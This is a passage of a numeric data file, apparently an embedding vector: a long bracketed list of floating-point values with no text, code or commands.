[ 0.011322238482534885, -0.007992583326995373, 0.0045359497889876366, 0.0036859000101685524, 0.04969086870551109, -0.020824452862143517, -0.0034442883916199207, 0.03659798949956894, -0.02838672138750553, 0.015576014295220375, 0.02940254844725132, 0.04221325367689133, -0.0015951658133417368, -0.004613547585904598, 0.006049108691513538, 0.022545715793967247, -0.030051548033952713, 0.03208320215344429, 0.01398878451436758, -0.004454824607819319, -0.016295557841658592, 0.01430623047053814, 0.02683476358652115, 0.0354410745203495, -0.016394319012761116, 0.01110355369746685, -0.015815861523151398, 0.012338065542280674, -0.033550508320331573, -0.04915473982691765, -0.005174368619918823, 0.00392574816942215, 0.03290150687098503, 0.0004027595277875662, 0.0157029926776886, -0.0005921248230151832, 0.0157029926776886, 0.024309303611516953, 0.00010410683898953721, 0.006377136334776878, 0.0022767928894609213, -0.025212261825799942, 0.00938229076564312, -0.006789816077798605, -0.02188260667026043, -0.013741881586611271, -0.030672332271933556, -0.021261822432279587, -0.06484362483024597, 0.04444243013858795, 0.0027282715309411287, 0.0012830107007175684, -0.020231887698173523, -0.022968977689743042, -0.002446097321808338, -0.031716376543045044, 0.0243657398968935, 0.003544813022017479, -0.02491597831249237, -0.020147236064076424, -0.03846034035086632, -0.01357963215559721, 0.020528171211481094, 0.013981729745864868, 0.000004036964583065128, 0.024690238758921623, -0.024662021547555923, 0.01772053726017475, 0.003398435190320015, 0.03721877187490463, 0.002886994509026408, 0.018129689618945122, 0.033324770629405975, 0.035130683332681656, 0.014242741279304028, 0.009692682884633541, 0.017381928861141205, -0.012719000689685345, -0.04966265335679054, 0.00413737865164876, -0.04610725864768028, 0.009530432522296906, -0.03301437571644783, -0.02264447696506977, 0.02552265301346779, 0.012838924303650856, -0.06885049492120743, -0.06811684370040894, 0.004994482733309269, 0.013953512534499168, -0.005657591857016087, 0.014362664893269539, -0.008020800538361073, -0.03030550479888916, 0.020471734926104546, -0.0051390971057116985, -0.023011302575469017, -0.0021462873555719852, -0.03575146570801735, 0.005562358070164919, -0.006842723581939936, 0.006726326886564493, -0.023124173283576965, -0.019244277849793434, 0.022658584639430046, 0.011301075108349323, -0.006821560673415661, -0.0223199762403965, 0.0025219316594302654, 0.07929094135761261, 0.04164890572428703, 0.020231887698173523, -0.04921117424964905, -0.028259743005037308, 0.013537305407226086, 0.014327392913401127, -0.003188568167388439, -0.010877814143896103, 0.014828252606093884, 0.008740345016121864, -0.020626932382583618, -0.029797591269016266, -0.03755738213658333, -0.03013620153069496, -0.02803400345146656, 0.02529691345989704, 0.028880525380373, 0.01693044975399971, 0.021177170798182487, -0.040689513087272644, 0.022573933005332947, -0.045063212513923645, -0.020006148144602776, -0.03831925243139267, -0.0009267657878808677, -0.03682372719049454, -0.014842361211776733, 0.027921132743358612, -0.013043500483036041, 0.003731753444299102, -0.03662620484828949, -0.09136799722909927, -0.025155827403068542, -0.03800886124372482, -0.021487561985850334, 0.014447317458689213, 0.0155477961525321, -0.009960748255252838, -0.0313495509326458, 0.01772053726017475, -0.04909830540418625, -0.014955230988562107, -0.008994301781058311, 0.09548773616552353, 0.024676131084561348, -0.061062488704919815, -0.016253231093287468, 0.019653430208563805, 0.02718748152256012, -0.03357872739434242, -0.00029628287302330136, -0.05183539539575577, 0.03371981158852577, -0.03665442392230034, -0.00010091032891068608, -0.03459455445408821, 0.025254588574171066, -0.011576195247471333, -0.06044170632958412, 0.026425611227750778, -0.01780518889427185, -0.0026048202998936176, 0.011018901132047176, -0.0008094871300272644, -0.02185438945889473, -0.03287329152226448, 0.018454190343618393, 0.028951069340109825, -0.01002423744648695, 0.0030933343805372715, -0.006800397299230099, 0.042438995093107224, 0.03202676773071289, 0.0023649721406400204, 0.06123179569840431, -0.05959518253803253, 0.0009549831738695502, -0.05595513805747032, -0.0023349912371486425, -0.01289535965770483, -0.028048111125826836, 0.010623857378959656, 0.03386089950799942, -0.04119742661714554, 0.025198152288794518, 0.002045762725174427, -0.011893641203641891, -0.030023330822587013, 0.010574476793408394, -0.03944794833660126, -0.0006776588852517307, 0.0009020755533128977, -0.03642868623137474, 0.01470127422362566, -0.035130683332681656, -0.008705073036253452, -0.010913086123764515, -0.01115998812019825, 0.019371256232261658, -0.020147236064076424, -0.0007429116521961987, -0.018877452239394188, 0.016281450167298317, 0.022884324193000793, -0.007936147972941399, 0.006370081566274166, 0.020344756543636322, 0.026792436838150024, -0.048590391874313354, -0.019893279299139977, 0.041338514536619186, -0.012098217383027077, -0.017170298844575882, 0.002199194859713316, -0.014997556805610657, -0.016394319012761116, -0.008345301263034344, -0.04534538835287094, 0.0068462505005300045, 0.019441800191998482, 0.020909106358885765, 0.0009867277694866061, -0.0006670773727819324, -0.02483132667839527, 0.02330758608877659, 0.013325675390660763, -0.021896714344620705, 0.0014849415747448802, -0.03814994543790817, -0.014278012327849865, 0.0224046278744936, 0.02141701988875866, -0.01472949143499136, 0.014038165099918842, 0.008810888044536114, 0.00795731134712696, 0.02864067815244198, -0.0011383964447304606, -0.0014223341131582856, -0.0356668159365654, 0.0012512661051005125, -0.028683003038167953, -0.014433208853006363, -0.01925838738679886, 0.01733960211277008, 0.06687527894973755, -0.0066804732196033, 0.009452834725379944, 0.003689427161589265, -0.0011313420254737139, 0.01087075937539339, 0.03668264299631119, -0.0487879142165184, -0.0065605491399765015, 0.010842542164027691, -0.029712939634919167, -0.017170298844575882, 0.013283348642289639, 0.0068885767832398415, 0.036005422472953796, 0.021233605220913887, -0.02059871330857277, -0.007689245976507664, 0.01827077753841877, -0.0014329156838357449, -0.023208824917674065, 0.015364383347332478, -0.01928660459816456, 0.037105903029441833, 0.004574748687446117, 0.006849777884781361, 0.012733109295368195, -0.010581531561911106, -0.0032855654135346413, 0.00430668331682682, -0.009276475757360458, 0.05527791753411293, -0.03039015829563141, -0.014108708128333092, 0.010828433558344841, -0.02718748152256012, -0.01908908225595951, -0.019907386973500252, 0.014870578423142433, 0.05093243718147278, 0.010031291283667088, -0.03360694274306297, 0.0313495509326458, 0.03115202859044075, 0.001402052934281528, -0.002731798682361841, 0.0008319728658534586, 0.033296551555395126, 0.0034178346395492554, -0.000553766789380461, 0.021896714344620705, -0.009029572829604149, 0.015237404964864254, 0.028189199045300484, -0.011667901650071144, 0.02625630609691143, -0.016944559291005135, 0.0023332275450229645, -0.034143075346946716, -0.008154833689332008, 0.019272495061159134, 0.017466580495238304, 0.0011251694522798061, -0.02940254844725132, -0.025706065818667412, -0.03637224808335304, 0.02596002258360386, -0.056604135781526566, 0.018637603148818016, 0.019822735339403152, 0.018172016367316246, -0.045853301882743835, 0.036993034183979034, -0.030079765245318413, 0.006557022221386433, 0.01870814710855484, -0.021021975204348564, 0.03394555300474167, -0.036061856895685196, -0.042269688099622726, -0.014517860487103462, -0.011935967020690441, 0.002340282080695033, 0.029035720974206924, -0.03724699094891548, -0.006511169020086527, 0.010510987602174282, -0.004634710494428873, 0.019977930933237076, 0.0008795897592790425, -0.007639865390956402, 0.028795873746275902, -0.009438726119697094, 0.042326126247644424, -0.009163605980575085, 0.0008654810953885317, -0.009636247530579567, 0.01050393283367157, 0.012535586953163147, -0.0008059599786065519, -0.0026524371933192015, -0.00369648146443069, 0.021656867116689682, 0.005149678327143192, -0.0074423435144126415, -0.015505470335483551, 0.0011780771892517805, -0.01841186359524727, 0.002005200134590268, 0.025169935077428818, 0.018087364733219147, -0.0048004877753555775, -0.01975219137966633, 0.005040335934609175, -0.012309848330914974, -0.019272495061159134, 0.016916342079639435, -0.0009981910698115826, 0.03216785565018654, 0.010581531561911106, 0.0031603507231920958, -0.0089308125898242, 0.010468661785125732, -0.04717952013015747, 0.022715020924806595, 0.017297277227044106, -0.016535406932234764, -0.04449886456131935, 0.020415300503373146, 0.006616984028369188, 0.008444061502814293, -0.012740163132548332, -0.03744451329112053, -0.014094599522650242, -0.03301437571644783, -0.0062783751636743546, 0.03369159623980522, -0.023871934041380882, -0.05677344277501106, -0.0023173552472144365, 0.012853032909333706, 0.04432956129312515, -0.011336347088217735, 0.03580790013074875, -0.01838364638388157, 0.008585149422287941, 0.007146060932427645, 0.05620909482240677, 0.033409420400857925, 0.0022027220111340284, -0.016831688582897186, 0.061852578073740005, 0.022446954622864723, 0.020993757992982864, 0.03806529566645622, 0.001149859745055437, 0.000403420883230865, 0.013509088195860386, 0.00687799509614706, 0.0008337364997714758, 0.019074972718954086, 0.05434674397110939, -0.02152988873422146, -0.005326037295162678, -0.013960566371679306, -0.014228632673621178, 0.005093243904411793, 0.004049199167639017, 0.007555213291198015, -0.012309848330914974, 0.008380572311580181, 0.02931789495050907, 0.04557112604379654, 0.014179252088069916, -0.020683366805315018, -0.004331373609602451, 0.00777389807626605, 0.02103608474135399, 0.00681097898632288, 0.03230894356966019, -0.007258930243551731, 0.006444152444601059, -0.022037802264094353, -0.01725495047867298, 0.014997556805610657, -0.035215336829423904, 0.0402098186314106, 0.03820638358592987, 0.005481233354657888, -0.023152390494942665, -0.03812173008918762, -0.053076960146427155, -0.045909736305475235, -0.020006148144602776, 0.006557022221386433, -0.017494797706604004, 0.013882968574762344, -0.010299356654286385, -0.02092321403324604, -0.029684722423553467, 0.013523196801543236, -0.0038552044425159693, 0.02415410801768303, 0.03750094771385193, -0.004916884936392307, -0.00648295134305954, 0.04376521334052086, -0.0447528213262558, -0.012034728191792965, -0.03837568685412407, -0.019681647419929504, -0.00369648146443069, 0.033550508320331573, 0.020965540781617165, -0.03772668540477753, 0.007001446560025215, 0.00022044856450520456, 0.0037634980399161577, 0.016069818288087845, 0.0012406845344230533, 0.015195079147815704, -0.020711584016680717, -0.04348303750157356, 0.03405842185020447, -0.0054565430618822575, -0.013114044442772865, -0.04734882339835167, 0.012450935319066048, -0.006045581307262182, 0.013389164581894875, -0.027695395052433014, 0.0057492987252771854, -0.012006510980427265, -0.015815861523151398, -0.022164780646562576, 0.03027728758752346, -0.0006622275104746222, -0.012316902168095112, -0.008853214792907238, 0.0034231252502650023, -0.04650230333209038, -0.02535334788262844, -0.007816224358975887, 0.009805552661418915, 0.007315365131944418, 0.019046755507588387, -0.008493442088365555, 0.03318368270993233, -0.008881432004272938, 0.029769374057650566, -0.027695395052433014, -0.014108708128333092, -0.003968073986470699, -0.02940254844725132, -0.02573428303003311, -0.01298001129180193, -0.003950438462197781, 0.005520032253116369, -0.03894003480672836, -0.00024822508567012846, 0.009805552661418915, 0.00826064869761467, -0.004796960856765509, 0.03188567981123924, 0.032365377992391586, -0.03118024580180645, -0.02040119282901287, 0.009283529594540596, 0.0018641130300238729, 0.03298616036772728, -0.006246630568057299, 0.011745499446988106, 0.003950438462197781, 0.026467936113476753, -0.014151033945381641, -0.007463506888598204, 0.0178616251796484, 0.027836481109261513, 0.0890541672706604, 0.00015574690769426525, 0.024873653426766396, 0.00482165114954114, -0.021346475929021835, -0.010334628634154797, -0.02540978416800499, -0.0031338967382907867, 0.026002349331974983, -0.00037035360583104193, -0.005149678327143192, -0.01292357686907053, 0.019131409004330635, -0.02928967773914337, 0.013219859451055527, 0.017142079770565033, -0.019949713721871376, 0.014080490916967392, -0.0025871843099594116, 0.04345482215285301, 0.012867141515016556, 0.010779052972793579, 0.004147960338741541, 0.0020351812709122896, 0.022362302988767624, 0.0018799853278324008, 0.01359374076128006, -0.0023914261255413294, -0.006983810570091009, 0.015858188271522522, -0.020443517714738846, 0.015265622176229954, -0.004183231852948666, -0.0009523378103040159, 0.004955683834850788, -0.02133236639201641, -0.024774892255663872, -0.0005343673401512206, 0.022150671109557152, -0.006909739691764116, -0.003756443504244089, 0.011731390841305256, 0.008895540609955788, 0.04173355922102928, 0.0023120646364986897, 0.021656867116689682, -0.008832051418721676, 0.001636610133573413, 0.002368499292060733, 0.019794518128037453, 0.005816314835101366, -0.023505108430981636, 0.02174151875078678, -0.013572577387094498, 0.026820654049515724, -0.022870216518640518, 0.0007993464823812246, 0.015844078734517097, -0.002655964344739914, -0.020528171211481094, 0.01002423744648695, 0.028683003038167953, -0.006779234390705824, 0.011590303853154182, 0.0038587315939366817, -0.00570344552397728, 0.024760782718658447, 0.028344394639134407, 0.025198152288794518, 0.019850952550768852, -0.02768128551542759, -0.044188473373651505, 0.04427312687039375, 0.023462781682610512, 0.0005489169270731509, 0.0011445689015090466, 0.017734646797180176, 0.047800302505493164, 0.010285248048603535, 0.029854027554392815, -0.0077950614504516125, -0.0030580624006688595, 0.010779052972793579, 0.043229080736637115, 0.00659934850409627, 0.012584967538714409, 0.014362664893269539, 0.0048463414423167706, -0.044357780367136, 0.04545825719833374, -0.01736781932413578, -0.006490005645900965, 0.024492718279361725, 0.004729944281280041, -0.0005008591688238084, -0.0068885767832398415, -0.006447679828852415, -0.0314624197781086, 0.014158088713884354, -0.024323413148522377, -0.03563859686255455, 0.00392574816942215, -0.0010934248566627502, 0.06399709731340408, -0.017988603562116623, -0.019413582980632782, -0.035187117755413055, -0.033352985978126526, 0.01882101595401764, 0.013106989674270153, 0.02130414918065071, -0.02316649816930294, 0.024295195937156677, -0.013255131430923939, 0.008479333482682705, 0.01657773181796074, 0.01511042658239603, 0.002354390686377883, 0.014969339594244957, 0.015928732231259346, 0.024986522272229195, 0.011371619068086147, -0.007731572259217501, 0.019822735339403152, -0.006645201705396175, 0.00649705994874239, -0.02325115166604519, -0.02316649816930294, 0.006687527522444725, -0.0008125734166242182, 0.0071848598308861256, 0.012669620104134083, 0.01599927432835102, 0.01774875447154045, -0.0012997647281736135, 0.032365377992391586, 0.01154092326760292, 0.03910933807492256, -0.006930903065949678, 0.023886043578386307, 0.025677848607301712, -0.007435289211571217, -0.0010581531096249819, 0.02351921610534191, -0.015039882622659206, 0.005773989018052816, 0.02258804254233837, -0.024577369913458824, -0.005368363577872515, 0.015618340112268925, 0.02945898286998272, 0.014588404446840286, -0.0017239077715203166, -0.0034337069373577833, 0.013854751363396645, 0.02940254844725132, -0.023476891219615936, -0.008027855306863785, 0.010257030837237835, 0.007086098659783602, 0.005911548621952534, -0.0355539433658123, 0.0056999181397259235, 0.0032943834085017443, -0.0009752644691616297, -0.04263651743531227, -0.007879713550209999, -0.03301437571644783, 0.01048982422798872, -0.034227725118398666, -0.008571039885282516, 0.0016004565404728055, 0.018524734303355217, -0.013043500483036041, 0.015491361729800701, 0.004049199167639017, 0.012888304889202118, 0.017607668414711952, -0.00736474571749568, -0.004856922663748264, 0.020316539332270622, -0.028273850679397583, 0.012020619586110115, 0.014997556805610657, -0.04351125657558441, -0.01917373389005661, -0.0032696931157261133, -0.02406945638358593, 0.008183050900697708, 0.006564076524227858, -0.04102812334895134, -0.014348556287586689, -0.02931789495050907, 0.02532513067126274, 0.020443517714738846, 0.00578457023948431, -0.0065711308270692825, -0.038714297115802765, 0.0020722164772450924, -0.005354254972189665, 0.0121969785541296, -0.009819661267101765, 0.0023349912371486425, 0.053838830441236496, -0.036259379237890244, -0.022009585052728653, 0.009022518992424011, 0.010264085605740547, 0.018877452239394188, -0.006962647661566734, 0.018905669450759888, -0.022884324193000793, -0.01597105711698532, -0.01870814710855484, 0.01398878451436758, 0.0017424254911020398, 0.009170660749077797, 0.023674411699175835, 0.02500063180923462, 0.0027159263845533133, -0.022997194901108742, -0.02150167152285576, 0.018228450790047646, 0.030587678775191307, -0.008542822673916817, -0.007244821637868881, 0.03479207307100296, -0.0054494887590408325, 0.029656505212187767, -0.0009673283202573657, -0.01475770864635706, 0.0077104088850319386, 0.018778691068291664, 0.0310673750936985, -0.02532513067126274, 0.007724517956376076, 0.016323775053024292, -0.009876095689833164, -0.0089590298011899, -0.02800578624010086, -0.01862349547445774, -0.0036083022132515907, -0.0202177781611681, 0.009184769354760647, 0.009713845327496529, -0.01181604340672493, 0.03665442392230034, 0.012584967538714409, 0.005269602406769991, 0.0004131206078454852, -0.009100116789340973, 0.012450935319066048, -0.014560187235474586, 0.0002229837264167145, -0.008098398335278034, 0.004172650631517172, 0.016859905794262886, -0.014912904240190983, 0.016267340630292892, -0.013114044442772865, -0.021924933418631554, 0.020641040056943893, -0.039617251604795456, 0.009064844809472561, -0.0022697383537888527, 0.00999602023512125, -0.026538480073213577, 0.021642757579684258, 0.012796598486602306, -0.010510987602174282, 0.017607668414711952, -0.013614903204143047, 0.019738083705306053, 0.002761779585853219, -0.0025060593616217375, -0.016225013881921768, 0.014475534670054913, 0.0007080807699821889, -0.004645292181521654, -0.015025774016976357, 0.028922852128744125, 0.03180103003978729, 0.009664464741945267, -0.025677848607301712, -0.029797591269016266, -0.026792436838150024, 0.01897621341049671, 0.021953150629997253, 0.01619679667055607, 0.004976846743375063, -0.02040119282901287, 0.015039882622659206, 0.004317264538258314, 0.005932711996138096, 0.022856106981635094, 0.0354410745203495, -0.0034919052850455046, 0.013530251570045948, 0.006394771859049797, 0.003024554345756769, -0.01687401533126831, -0.027483763173222542, 0.019103191792964935, -0.0051567330956459045, 0.018172016367316246, -0.007682191673666239, 0.030728766694664955, -0.015801753848791122, -0.03671085834503174, 0.014165143482387066, -0.0006075562559999526, 0.002525458810850978, 0.00558704836294055, -0.02532513067126274, -0.017607668414711952, 0.012620239518582821, -0.007590485271066427, -0.008909649215638638, 0.034143075346946716, -0.030728766694664955, 0.007050827145576477, 0.0037388077471405268, 0.004193813540041447, 0.000798905617557466, 0.001443497254513204, -0.0018764581764116883, 0.014461426064372063, 0.013283348642289639, 0.004620601888746023, 0.00852166023105383, 0.0037035360001027584, 0.01824256032705307, 0.01181604340672493, -0.0038904761895537376, -0.05454426631331444, 0.02483132667839527, 0.009488106705248356, -0.017170298844575882, 0.017551233991980553, -0.009481051936745644, 0.0066381474025547504, -0.009212986566126347, 0.0005229039816185832, 0.004408971406519413, -0.0032132582273334265, -0.0042396667413413525, -0.025677848607301712, -0.04088703542947769, -0.020909106358885765, -0.05144035071134567, -0.020584605634212494, 0.0060173640958964825, -0.008803834207355976, -0.028429046273231506, -0.03462276980280876, 0.0005352491280063987, 0.008140725083649158, -0.01862349547445774, 0.00094528344925493, -0.0027088720817118883, -0.020753910765051842, -0.013121098279953003, -0.013699555769562721, 0.0021286513656377792, -0.045034997165203094, -0.03287329152226448, 0.0035783210769295692, -0.005908021703362465, 0.005714026745408773, 0.021487561985850334, 0.00783738773316145, -0.013438544236123562, -0.014870578423142433, 0.028316177427768707, 0.001540494617074728, -0.010800216346979141, 0.00865569245070219, 0.02351921610534191, 0.008832051418721676, 0.0006966174696572125, -0.04074595123529434, -0.0018429500050842762, 0.00024557969300076365, -0.04887256398797035, -0.006542913615703583, 0.0002510909107513726, 0.001262729405425489, -0.01602749340236187, 0.02773771993815899, -0.012740163132548332, 0.01640842854976654, 0.012429771944880486, -0.013713664375245571, 0.017664102837443352, 0.009347018785774708, -0.03721877187490463, 0.009488106705248356, 0.007950257509946823, 0.007964366115629673, -0.0027494344394654036, -0.017184406518936157, -0.011639684438705444, -0.01400289312005043, -0.02092321403324604, 0.009925476275384426, 0.009664464741945267, 0.008895540609955788, 0.06490005552768707, 0.032478246837854385, 0.01289535965770483, -0.021685084328055382, 0.01958288624882698, 0.0005916839581914246, 0.008105453103780746, 0.03118024580180645, -0.03978655859827995, -0.018454190343618393, -0.04842108488082886, -0.009431671351194382, 0.0026929997839033604, -0.04520430043339729, 0.0039574927650392056, 0.006722799502313137, -0.01780518889427185, 0.02302541211247444, -0.0005259902682155371, 0.005745771341025829, -0.006239576265215874, -0.0023826081305742264, -0.0014152798103168607, 0.0021110153757035732, 0.03727520629763603, 0.030728766694664955, -0.0039892373606562614, 0.022517498582601547, 0.019244277849793434, 0.0012830107007175684, -0.01777697168290615, -0.019159626215696335, -0.025776609778404236, 0.025833044201135635, -0.03860142454504967, 0.02395658753812313, 0.0020087272860109806, -0.0010493352310732007, -0.04088703542947769, -0.0356668159365654, 0.014143980108201504, 0.022968977689743042, 0.03439703211188316, -0.03719055652618408, -0.017875732854008675, -0.041423168033361435, 0.019399473443627357, -0.004701727069914341, -0.0050191730260849, -0.009163605980575085, 0.011928913183510303, 0.020880889147520065, 0.015434926375746727, -0.047659218311309814, 0.01876458153128624, -0.01471538282930851, -0.0034495792351663113, -0.031547073274850845, -0.03894003480672836, 0.004952156450599432, -0.018933886662125587, -0.009121280163526535, 0.003033372340723872, 0.04119742661714554, 0.03439703211188316, 0.013911186717450619, 0.011068281717598438, -0.006003255490213633, 0.02351921610534191, -0.02497241273522377, 0.011435108259320259, 0.008422899059951305, 0.005199058912694454, -0.01616857945919037, -0.011329292319715023, 0.009086008183658123, 0.009960748255252838, -0.007491724099963903, 0.0021304150577634573, 0.025536762550473213, 0.014404990710318089, -0.026425611227750778, -0.0000375864801753778, -0.024323413148522377, 0.02081034518778324, 0.014066382311284542, -0.038855381309986115, 0.01821434311568737, -0.01515275239944458, 0.01478592585772276, 0.004391335416585207, -0.006151396781206131, -0.000014081152585276868, 0.013685447163879871, 0.02357565239071846, -0.02089499682188034, -0.005068553611636162, -0.005199058912694454, -0.03284507244825363, 0.0003595516027417034, 0.041536036878824234, 0.01728316769003868, -0.0013755990657955408, -0.004077416844666004, -0.01903264783322811, -0.0022468117531389, -0.00041179792606271803, 0.0314059853553772, 0.014024055562913418, -0.013748936355113983, 0.03369159623980522, -0.014546078629791737, 0.04472460597753525, 0.007308310829102993, -0.005400108173489571, -0.009516323916614056, -0.014588404446840286, -0.020725691691040993, 0.0015704756369814277, 0.003273220267146826, -0.00025153180467896163, -0.02756841666996479, 0.010729672387242317, 0.013389164581894875, -0.025423891842365265, 0.007992583326995373, -0.0006388599285855889, 0.016041601076722145, -0.004804015159606934, 0.025282805785536766, -0.009840823709964752, -0.0011304602958261967, -0.01041928119957447, -0.005206113215535879, 0.011011846363544464, -0.01719851605594158, 0.036993034183979034, 0.008874377235770226, -0.028767656534910202, -0.021924933418631554, 0.03182924538850784, 0.0045359497889876366, 0.011470380239188671, 0.0402098186314106, -0.022108346223831177, -0.025593196973204613, -0.008345301263034344, -0.008479333482682705, 0.0017873969627544284, 0.014313284307718277, -0.009452834725379944, -0.014814144000411034, -0.02718748152256012, 0.01075083576142788, -0.0037423348985612392, -0.00023565952142234892, 0.0017821062356233597, 0.020203670486807823, 0.013798316940665245, 0.0027335621416568756, -0.017607668414711952, -0.00864158384501934, 0.0004148842126596719, 0.014249795116484165, 0.013509088195860386, 0.004804015159606934, -0.02191082388162613, 0.018454190343618393, -0.0001791144604794681, 0.014912904240190983, -0.036993034183979034, 0.016648275777697563, -0.0007526114350184798, -0.004729944281280041, -0.0201049093157053, 0.011957130394876003, 0.011237585917115211, -0.004169123247265816, 0.029938679188489914, 0.04384986683726311, -0.0016022202325984836, 0.00002090127964038402, -0.0111176623031497, 0.012987066060304642, -0.008817942813038826, -0.0023032466415315866, 0.003382562892511487, -0.01824256032705307, -0.0010211177868768573, 0.0026577278040349483, 0.008676855824887753, 0.016253231093287468, 0.008056072518229485, 0.0016842270269989967, -0.020288322120904922, -0.009107171557843685, -0.03450990095734596, 0.010200596414506435, 0.010588585399091244, 0.03851677477359772, 0.026242196559906006, -0.02724391594529152, -0.014355611056089401, 0.00001887590769911185, 0.001685990602709353, 0.004020981956273317, -0.005050917621701956, -0.008041963912546635, -0.011597358621656895, 0.0021639231126755476, -0.0201895609498024, -0.013868859969079494, 0.006045581307262182, -0.0089308125898242, -0.01154092326760292, -0.015491361729800701, -0.007089626044034958, -0.007668083067983389, 0.008168942295014858, -0.003366690594702959, 0.02954363450407982, 0.01152681466192007, 0.021431127563118935, -0.018933886662125587, 0.028739439323544502, 0.011773716658353806, 0.018990321084856987, 0.028189199045300484, -0.003844622988253832, -0.008817942813038826, -0.0038728404324501753, 0.032506462186574936, 0.014828252606093884, -0.03397376835346222, -0.01298001129180193, 0.00941050797700882, -0.02488776110112667, -0.007886768318712711, 0.011851315386593342, -0.016747036948800087, -0.002574839163571596, 0.005636428948491812, 0.013099935837090015, 0.008592203259468079, -0.02284199930727482, 0.022884324193000793, -0.00008040861575864255, 0.003301437711343169, -0.003999818582087755, 0.024676131084561348, -0.03041837550699711, 0.015872295945882797, 0.0008989892667159438, 0.004906303249299526, 0.02762485109269619, -0.020499954000115395, -0.03860142454504967, -0.012987066060304642, 0.021374693140387535, 0.003731753444299102, -0.009847878478467464, 0.00827475730329752, 0.009699736721813679, 0.023335803300142288, 0.015618340112268925, 0.019512344151735306, -0.016394319012761116, -0.03019263595342636, -0.003250293666496873, -0.012429771944880486, -0.010771999135613441, -0.013128153048455715, -0.013297457247972488, 0.011921858415007591, 0.027808263897895813, -0.012535586953163147, -0.02732856757938862, -0.013255131430923939, -0.011865423992276192, -0.03408664092421532, -0.03194211423397064, -0.00591507600620389, 0.035892553627491, 0.028104547411203384, -0.0003718967200256884, 0.018030928447842598, 0.007265984546393156, 0.017762864008545876, 0.003428416093811393, -0.015801753848791122, 0.0014038165099918842, 0.005745771341025829, -0.0010890159755945206, 0.011604412458837032, -0.002428461331874132, -0.012493261136114597, 0.01733960211277008, -0.017085645347833633, 0.04726417362689972, -0.007512887008488178, 0.006331282667815685, 0.03208320215344429, -0.02552265301346779, -0.002876412821933627, 0.0021374693606048822, 0.00015806162264198065, 0.012958848848938942, -0.040520209819078445, -0.015279730781912804, -0.033352985978126526, 0.01073672715574503, 0.016775254160165787, -0.012373337522149086, 0.004938047844916582, -0.021106626838445663, -0.026961741968989372, 0.013812425546348095, 0.006902685388922691, 0.02776593714952469, 0.03239359334111214, 0.00826064869761467, 0.010687346570193768, 0.026129327714443207, 0.008535768836736679, -0.022362302988767624, -0.020824452862143517, -0.010891922749578953, 0.016761144623160362, 0.008690964430570602, -0.0003555835282895714, 0.016732927411794662, 0.03758559748530388, 0.021670976653695107, -0.020147236064076424, 0.007071990054100752, 0.023871934041380882, -0.004486569203436375, -0.0032890925649553537, -0.007512887008488178, -0.018990321084856987, -0.017960386350750923, 0.017240840941667557, -0.019512344151735306, -0.013480870984494686, -0.0024249341804534197, -0.016648275777697563, 0.006518223322927952, -0.0034777966793626547, 0.005287238396704197, -0.015886405482888222, -0.00976322591304779, -0.010130052454769611, 0.0012971194228157401, 0.01862349547445774, -0.0024496244732290506, -0.01903264783322811, -0.002982228295877576, -0.0015837025130167603, 0.004514786414802074, -0.0024408064782619476, 0.004684091079980135, 0.014531969092786312, -0.03504602983593941, -0.008415844291448593, -0.015307948924601078, 0.006521750241518021, -0.01180193480104208, 0.012077054008841515, 0.0017168534686788917, 0.00795731134712696, 0.026101110503077507, 0.001443497254513204, 0.026496153324842453, -0.012062945403158665, -0.007816224358975887, -0.006676946301013231, -0.015505470335483551, 0.00189056689850986, 0.004169123247265816, -0.006945011671632528, -0.0017856333870440722, 0.014221577905118465, -0.006969701964408159, 0.022856106981635094, -0.001230102963745594, 0.018425973132252693, 0.018891559913754463, -0.04297512397170067, -0.008225376717746258, 0.01824256032705307, -0.027441438287496567, 0.02059871330857277, 0.00894492119550705, 0.008387627080082893, 0.00014240977179724723, 0.0030368994921445847, 0.006038527004420757, -0.018115581944584846, -0.013784208334982395, -0.018256668001413345, -0.0008668037480674684, 0.0006388599285855889, -0.00027996968128718436, 0.002670072950422764, 0.020344756543636322, 0.017621776089072227, -0.0001797758013708517, -0.012140543200075626, 0.0179180596023798, -0.012803652323782444, -0.026877088472247124, -0.00699439225718379, 0.009657410904765129, -0.014038165099918842, 0.004624129272997379, 0.0036859000101685524, -0.012366282753646374, 0.020006148144602776, -0.021191280335187912, -0.008295920677483082, 0.009262367151677608, 0.0002508704783394933, 0.021318258717656136, 0.029741156846284866, 0.022178890183568, -0.021374693140387535, 0.005833950825035572, -0.015279730781912804, -0.017381928861141205, 0.007766843773424625, -0.034143075346946716, 0.010955411940813065, -0.009495160542428493, -0.007463506888598204, -0.0222353246062994, -0.0027670704293996096, 0.0028376139234751463, -0.001067852834239602, 0.018341321498155594, -0.03199854865670204, -0.04305977746844292, 0.0063453917391598225, -0.008415844291448593, -0.006620511412620544, -0.0005427443538792431, 0.008147778920829296, -0.00523080350831151, -0.020274214446544647, 0.006895631086081266, 0.008747398853302002, 0.005114406812936068, -0.036061856895685196, 0.0034495792351663113, -0.02097964845597744, 0.021078409627079964, -0.00410916144028306, -0.0012741927057504654, 0.02628452330827713, -0.011018901132047176, -0.03228072449564934, 0.024351630359888077, -0.012535586953163147, 0.018143799155950546, 0.01357963215559721, -0.015209187753498554, -0.011230532079935074, 0.01657773181796074, 0.016013383865356445, -0.023561542853713036, -0.009142442606389523, -0.011837205849587917, -0.005075607914477587, 0.0033032014034688473, 0.005925657693296671, -0.01867992989718914, -0.019371256232261658, 0.026679567992687225, -0.014383828267455101, -0.02040119282901287, -0.028570134192705154, -0.012147597968578339, -0.0054318527691066265, 0.0017009811708703637, 0.02275734581053257, -0.007893822155892849, -0.01477181725203991, -0.00592918461188674, 0.0033613997511565685, -0.0008006691932678223, 0.04362412542104721, -0.007301256526261568, 0.01047571562230587, 0.006133760791271925, -0.00503328163176775, 0.005364836193621159, -0.01975219137966633, -0.02540978416800499, -0.00865569245070219, -0.01405932754278183, -0.00524491211399436, -0.010059509426355362, 0.01955466903746128, -0.004419553093612194, 0.001818259828723967, 0.017551233991980553, -0.011717282235622406, -0.01949823461472988, 0.013925295323133469, 0.016309667378664017, -0.009276475757360458, 0.011357510462403297, 0.002356154378503561, -0.0027088720817118883, 0.010757889598608017, 0.03490494564175606, 0.0019611103925853968, 0.011710227467119694, -0.009459888562560081, -0.007265984546393156, 0.02943076565861702, -0.004617074970155954, 0.021981367841362953, 0.004119742661714554, 0.01969575695693493, 0.0022767928894609213, 0.027370894327759743, 0.022545715793967247, -0.021374693140387535, 0.022249432280659676, -0.01815790683031082, 0.0036065385211259127, -0.0015281494706869125, -0.0002583657333161682, 0.013410327024757862, 0.005541195161640644, -0.0029275568667799234, 0.009840823709964752, 0.009784389287233353, 